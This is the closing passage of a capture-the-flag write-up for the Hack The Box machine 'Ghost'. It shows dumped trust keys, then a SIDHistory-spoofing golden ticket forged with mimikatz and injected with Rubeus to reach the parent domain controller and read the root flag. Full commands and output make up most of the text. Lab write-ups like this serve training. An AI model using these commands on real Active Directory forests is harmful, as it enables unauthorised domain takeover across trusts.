    * 4/3/2025 7:46:54 AM - CLEAR   - 35 f5 dd 6d 26 01 1b fc 6b d3 38 93 40 05 c4 ca 58 c1 f3 67 50 03 09 6d 81 9f c7 9d 76 26 8b e5 a2 9d ce 90 f6 bf 18 b3 e8 d7 13 52 47 aa ff 03 da 85 06 bb 05 41 53 9b 6c 7a ad 48 96 ec a6 84 dc 3a 64 a0 37 72 62 ca 05 77 d2 d6 03 c0 9d 5b d5 0f 6c 38 33 25 1a bd 2b 3e 8c 84 ff 98 41 56 84 05 cf 01 bc ec bd a8 f0 f1 4e 82 4a 4c f3 0b 36 15 04 72 80 43 7e f3 d9 f2 eb 33 aa ae f4 ae be e3 4a e5 23 f2 5e 75 7e 7b 89 ee 6c a8 59 da 2d 4a 31 f2 e9 57 fe 24 13 e6 ed c4 51 05 cd af b1 df 3e fd d1 e9 ac 4c 77 eb 7a 94 34 f9 fa 21 e8 ec 5e 0d fb e3 c6 ab 44 4f 1d cf 1e ee a9 e3 92 c8 3b 67 a2 aa 77 b1 af 5f 4b 04 61 86 1e 3a 60 ff 94 ef 89 6b a2 45 a2 9c ca db 1b 38 8a 5f ce f8 0f a1 5e 4e 21 f9 7a c9 e6 76 75 f0 e3 66 
        * aes256_hmac       c1a816225b6e618e302b706945dd36c0ff57ed74344dc934d7445818e381b2eb
        * aes128_hmac       07b599b214cd961bdc9d9184796e7842
        * rc4_hmac_nt       97cf971f2c9e3886b338d3712f058a31

 [ In-1] CORP.GHOST.HTB -> GHOST.HTB
    * 7/22/2024 9:21:26 AM - CLEAR   - de 0b 64 63 58 9d ed e1 bc 36 c0 50 7c 4d 41 6d bd 82 72 e9 98 9b 13 58 b8 68 f1 94 8c ca 12 50 9b af 45 7d 0a 4d 4e 40 e2 7d 12 59 72 2f 87 22 64 c8 fa b2 96 8d aa c1 f1 17 a3 e7 aa 2b ec 87 b5 59 57 71 6f 33 87 4c e0 8a 8b 03 38 a2 71 b6 d5 0b 61 fd 7e 14 3e 46 16 d9 29 d8 f6 f9 05 69 3f b7 4f c1 28 0b 7e ec e5 46 ab 7e e8 2c 8b be 70 b5 d9 6c 96 1b fb 56 33 bc 41 15 b5 73 42 25 54 15 4b b6 fc 55 07 81 60 4a 6b 4c 22 a2 55 61 e5 91 e6 75 e3 62 d4 9a 37 77 bd 63 90 8e 6a 2a 2c c6 88 8f 57 44 7a 9e 35 aa e5 6a 2b 5f c8 0a 8c 4f cb bd af c9 60 59 ff 15 d9 fd cf 27 93 9f f7 19 9e 91 2b 38 d7 0e ec c9 43 e6 8c 3b 60 02 5f b7 c3 c1 67 c2 6b 44 db 1f 9c f7 72 2f 3a 54 6e 62 02 c9 46 d1 b7 3d 26 54 d0 4f 35 65 a8 3f 
        * aes256_hmac       de2e49c70945c0cb0dec99c93587de84f0b048843b8e295c6da720ba85545ffe
        * aes128_hmac       b55ca148bc95f95b8cb72f67661e1a08
        * rc4_hmac_nt       0b0124f5d6c07ad530d6bf6a6404fdaa

 [Out-1] GHOST.HTB -> CORP.GHOST.HTB
    * 4/3/2025 7:46:54 AM - CLEAR   - 78 10 13 24 91 0a 57 22 71 4e f6 ef 53 6a d8 54 02 97 63 0b 78 28 41 b7 5e 5e e6 b7 50 03 35 96 f2 e5 8b a3 c1 21 fa f6 01 f5 5f 7b 38 98 bc 8b 2b f5 3e 91 ce 8a 01 06 59 c0 9b 19 8c d8 d3 1a 17 9f d4 f1 b2 cb a0 49 f6 7f 97 f7 a0 79 63 bb 20 4a bf a3 d9 dd b1 13 20 c6 a0 84 a2 ea 65 79 6a b6 d3 db 17 e9 be b8 c1 35 57 38 c8 3b a6 6a 90 32 66 ba 0e bd fd 67 bf f4 e9 3c f2 e5 37 94 84 d6 c0 71 d3 42 85 ef 4e 94 ac 56 0f df 05 77 1b 74 57 4f a2 07 07 a1 d6 8e ee a1 cd 6a c0 4c d9 3f 16 0a fa 47 07 45 45 ad b5 6d e4 01 b1 e4 bf 76 c2 8e 5b 4e f4 04 ed 08 e4 e0 7e d8 18 5a f5 df 07 c3 97 3d 7e 6d 28 1e c1 1a ec 6d 06 83 0f 27 ea c8 00 af 92 c9 1f f6 50 45 f5 c1 bb 4a 09 bb d6 df 6b cf d6 fe fe d8 44 bb 19 90 46 0b 
        * aes256_hmac       b50449e019e0a55f9227fb2e830b044e9e9ad9952e2249e5de29f2027cd8f40d
        * aes128_hmac       81f4c2f21a640eed29861d71a619b4bb
        * rc4_hmac_nt       ea4e9954536eb29091fc96bbce83be23


mimikatz(commandline) # exit
Bye!

Now we should have all we need.

SIDHistory Spoofing

Next step is to get the SIDs of both domain:

PS C:\users\administrator\desktop> wmic useraccount get name,sid
wmic useraccount get name,sid
Name                  SID                                            
Administrator         S-1-5-21-2034262909-2733679486-179904498-500   
Guest                 S-1-5-21-2034262909-2733679486-179904498-501   
krbtgt                S-1-5-21-2034262909-2733679486-179904498-502   
Administrator         S-1-5-21-4084500788-938703357-3654145966-500   
Guest                 S-1-5-21-4084500788-938703357-3654145966-501   
krbtgt                S-1-5-21-4084500788-938703357-3654145966-502   
kathryn.holland       S-1-5-21-4084500788-938703357-3654145966-3602  
cassandra.shelton     S-1-5-21-4084500788-938703357-3654145966-3603  
robert.steeves        S-1-5-21-4084500788-938703357-3654145966-3604  
florence.ramirez      S-1-5-21-4084500788-938703357-3654145966-3606  
justin.bradley        S-1-5-21-4084500788-938703357-3654145966-3607  
arthur.boyd           S-1-5-21-4084500788-938703357-3654145966-3608  
beth.clark            S-1-5-21-4084500788-938703357-3654145966-3610  
charles.gray          S-1-5-21-4084500788-938703357-3654145966-3611  
jason.taylor          S-1-5-21-4084500788-938703357-3654145966-3612  
intranet_principal    S-1-5-21-4084500788-938703357-3654145966-3614  
gitea_temp_principal  S-1-5-21-4084500788-938703357-3654145966-3615 

And we can also get the SID of the CORP.GHOST.HTB from BloodHound:S-1-5-21-2034262909-2733679486-179904498

Now what we can do is perform a Golden Ticket attack using mimikatz:

PS C:\users\administrator\desktop> .\mimi.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimi.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User      : Administrator
Domain    : CORP.GHOST.HTB (CORP)
SID       : S-1-5-21-2034262909-2733679486-179904498-502
User Id   : 500
Groups Id : *513 512 520 518 519 
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ; 
ServiceKey: 61f02da833df265bbc885f02b950daa2 - rc4_hmac_nt      
Service   : krbtgt
Target    : GHOST.HTB
Lifetime  : 4/4/2025 3:24:41 AM ; 4/2/2035 3:24:41 AM ; 4/2/2035 3:24:41 AM
-> Ticket : golden.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

Now we can use that ticket to request access to the CIFS (file system) service on the new domain using Rubeus :

PS C:\users\administrator\desktop> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1 

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*] Using domain controller: dc01.ghost.htb (10.0.0.254)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      doIFajCCBWagAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBENJRlMbDmRjMDEuZ2hvc3QuaHRio4IEJjCCBCKgAwIBEqEDAgEEooIEFASCBBAfmBVyZplulQ+JK/AFbeGjXRlnfZg9DrIYovTDG2imZXJyGI1krygi1vSLWaldh4hcRBbOqto8IINPgYgG67CBd1YT2zWCgJsaELj7+X36BCALdrJg1CCwmw47Xy2KTdyF87TcJNjGypbpBvJOZWIOoRy5KXo6sh0Fd9yH/aOaofNOj5Q71IbIkYdjmTXmpYUhMf9pF/+igtoGTTTVgpiN74AKyI8k8TrwULa+K+mpeQl8I0Uy5inZUZy32IQdsmPMz9N87uZb7YT6eg0TMxO/OD+Xjipt4ZANd/p72D19Zmc6ZUaPSWyM5TaEVytLfKY0/lixC6SxvGAQGGFyRqNVvbVfxULYGe9aEfzlz6Aq4KP2fc5NnK/S7p89QxsrupYqGt2gLySSkRqJxCCgwt75DEDax85iaBbJFi4rvDtebjL+/EU9f3ZwbLvqF4bhMPjTBtfvp/SqLAVyo2PqKMhrJGpoLr9kWm7+XwO1oyn/E01v4AYN5rJf988mve4fntdalzOxSQR5cCPO8Zx9tRDIYRLVsP1lvXZ8QfoJBz0YWwQv2pSqNVEY4A3TCVc+VEmNKR0JlUW4LK5S6nEgtB3wrDMITeXUR4sQRhX3/P+pAPegILVNVtNsTTPRtf5Pn8waiofqKQEK83984gJVyt+xZv4f1uhgjj7HnPfuew6fD7SF9VCUKmjnLay47Yy7W+chEAG5C274Xkv7P+U++NhL7Mgm0NbRHoBjM87/on4AI4EccD+1Xt/SvdbVWusBDDnPeNlWy51TUGVDT6TBkDwYC0ad824kIgBHq1amT27ON+rWgQW9nfXP0sNkz3MfXAx9YLeG1d6B11OCTHdUVVjsc2zx6NU4gimQHGxvXUo1VWMx/+Cnou+lTGSuC9PzWyW+VEMgq2QJdeUAhWjPag/UFhhLaP52HRNSaKz5fX9Cm7mvgHDDYrLORA5rxweVjnpa9fXzsb+f2nvBFnJbhgnYP/+oZ+L08pgbOcOipd0k5DfoRTP03+2nmRs9ctjsearNqhq0DQKJNLawIJ9Xe14RxOoRFB8tl0xUJbeAMGrOG+13yscM4MKyuZqa02RURbDIoOVqlAujO2voy6Yqxqbm9dZBYQIKE+ioGiOIwDQ9fk1QMSKWvG5ySqk2Tq9gHzf5eFz0NNp9mPZDOqrJVAjCfP0GV0throJjuB4hI4ag7s5BXyF6oLpKx3ysME/hxvQen+ap2EEfpqEKYzlnpWorwq+ARTjGT2jmx3y83bROZRa66Uzzg12RRMP83eX9jlyQq9P+x2RB5lbmdvWl/NvpsB4CKfdFYomGIHHVUNjyvKWtiYHDKuFzc8RFSlkcDJQ4vAcgaCdZonTvt0QAdVhbWC8iqekFH0aIGi0lmAeX2qOB6jCB56ADAgEAooHfBIHcfYHZMIHWoIHTMIHQMIHNoCswKaADAgESoSIEICt1CHiBMx8wt5i/NBi207Oj1SeO9oP8sypcsuL3g7OxoRAbDkNPUlAuR0hPU1QuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI1MDQwNDEwMjUwMVqmERgPMjAyNTA0MDQyMDI1MDFapxEYDzIwMjUwNDExMTAyNTAxWqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRDSUZTGw5kYzAxLmdob3N0Lmh0Yg==

  ServiceName              :  CIFS/dc01.ghost.htb
  ServiceRealm             :  GHOST.HTB
  UserName                 :  Administrator
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  4/4/2025 3:25:01 AM
  EndTime                  :  4/4/2025 1:25:01 PM
  RenewTill                :  4/11/2025 3:25:01 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  K3UIeIEzHzC3mL80GLbTs6PVJ472g/yzKlyy4veDs7E=

And now we can claim our root flag:

PS C:\users\administrator\desktop> type \\DC01.ghost.htb\c$\users\administrator\desktop\root.txt
type \\DC01.ghost.htb\c$\users\administrator\desktop\root.txt
d74463e00bbe6318b1fc2b3573a3c6e4
PS C:\users\administrator\desktop>

That was it for Ghost, hope you learned something new!
-0xkujen